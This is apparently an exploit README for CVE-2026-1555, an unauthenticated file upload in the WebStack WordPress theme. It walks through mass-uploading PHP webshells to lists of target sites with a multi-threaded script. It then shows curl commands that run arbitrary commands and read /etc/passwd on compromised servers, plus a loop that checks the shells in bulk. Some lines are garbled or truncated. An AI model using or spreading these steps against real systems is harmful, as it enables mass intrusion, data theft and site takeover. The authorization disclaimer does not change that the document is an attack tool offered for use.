Share
## https://sploitus.com/exploit?id=D7138864-4320-5F01-874C-DBD7EC266442
# CVE-2026-1555
WebStack <= 1.2024 - Unauthenticated Arbitrary File Upload




# ๐Ÿ‘ค By: [Nxploited](https://github.com/Nxploited)
### ๐Ÿ”— Nxploited ZeroDay Hub โ€” [t.me/KNxploited](https://t.me/KNxploited)

---

# ๐Ÿ’€ CVE-2026-1555 โ€” WebStack WordPress Arbitrary File Upload

**Unauthenticated Remote Code Execution via `img_upload` AJAX handler**

![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=flat-square)
![CVE](https://img.shields.io/badge/CVE-2026--1555-critical?style=flat-square&color=red)
![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=flat-square)
![Auth](https://img.shields.io/badge/Auth-None%20Required-orange?style=flat-square)



---

## ๐Ÿ“Œ Vulnerability Overview

| Field | Detail |
|---|---|
| **CVE ID** | CVE-2026-1555 |
| **Affected Component** | WebStack Theme for WordPress |
| **Vulnerable Versions** | All versions up to and including **1.2024** |
| **Vulnerability Type** | Arbitrary File Upload โ†’ Remote Code Execution |
| **Authentication Required** | โŒ None (Unauthenticated) |
| **CVSS Score** | **9.8 CRITICAL** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |

### ๐Ÿ”ฌ Technical Root Cause

The `io_img_upload()` function registered under the WordPress `admin-ajax.php` action hook `img_upload` performs **zero file type or extension validation** before writing the uploaded file to the server. Because the action is registered without authentication checks (`wp_ajax_nopriv_`), any unauthenticated remote attacker can POST an arbitrary file โ€” including a PHP webshell โ€” and the server will store it in a publicly accessible path, enabling direct Remote Code Execution.

**Vulnerable endpoint:**
```
POST /wp-admin/admin-ajax.php
action=img_upload
files=@
```

---

## โš™๏ธ Tool Features

- ๐Ÿ” Multi-threaded scanning with configurable worker count
- ๐Ÿ“‹ Bulk target support via a target list file
- ๐Ÿ“ค Automatic shell URL extraction from JSON response
- ๐Ÿ’พ Successful shell URLs saved to `uploaded_paths.txt`
- ๐ŸŽจ Rich terminal UI with live progress tracking
- ๐Ÿ”• SSL verification suppressed for maximum compatibility

---

## ๐Ÿ“ฆ Requirements

**Python version:** `3.8+`

Install dependencies:

```bash
pip install requests rich urllib3
```

---

## ๐Ÿš€ Usage

### 1. Prepare your target list

Create a file named `list.txt` (or any name you prefer) with one target per line:

```
https://target1.com
https://target2.com
http://target3.com
```

> Targets without `http://` or `https://` are automatically prefixed with `http://`.

### 2. Prepare your payload

Place your webshell in the **same directory** as the script. Example:

```bash
# Minimal PHP webshell
echo '' > shell.php
```

### 3. Run the tool

```bash
python CVE-2026-1555.py
```

You will be prompted for:

| Prompt | Description | Default |
|---|---|---|
| `Targets file` | Path to your targets list | `list.txt` |
| `Threads` | Number of concurrent workers | `6` |
| `Local file to upload` | Filename of your payload (in script dir) | `shell.php` |

---

## ๐Ÿ“ค Output & Shell Extraction

### Live Output

Each successful upload prints:

```
โ•ญโ”€ IMG_UPLOAD โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ
โ”‚ Upload successful                              โ”‚
โ”‚                                                โ”‚
โ”‚ Target:    https://target.com                  โ”‚
โ”‚ Shell URL: https://target.com/wp-content/...   โ”‚
โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ
```

### Saved Results

All successful shell URLs are appended to:

```
uploaded_paths.txt
```

### Accessing Your Shell

After a successful upload, access the shell directly via browser or curl:

```bash
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id

# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"

# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"
```

> The exact upload path is extracted from the server's JSON response (`data.src`) and printed automatically.

### Bulk Shell Verification

Quickly verify all uploaded shells from the output file:

```bash
while read url; do
  echo -n "[*] $url -> "
  curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done  **This tool is provided strictly for authorized penetration testing, security research, and educational purposes only.**
>
> The author โ€” **Nxploited** โ€” holds **no responsibility** for any misuse, damage, or illegal activity carried out using this tool. By using this tool, you confirm that you have explicit written permission to test all target systems.
>
> Unauthorized use against systems you do not own or have explicit permission to test is **illegal** and may result in criminal prosecution under applicable cybercrime laws.
>
> **Use responsibly. You are solely accountable for your actions.**

---



**๐Ÿ‘ค Author:** [Nxploited](https://github.com/Nxploited)
**๐Ÿ“ฃ Channel:** [Nxploited ZeroDay Hub](https://t.me/KNxploited)
**๐Ÿ’ฌ Telegram:** [@KNxploited](https://t.me/KNxploited)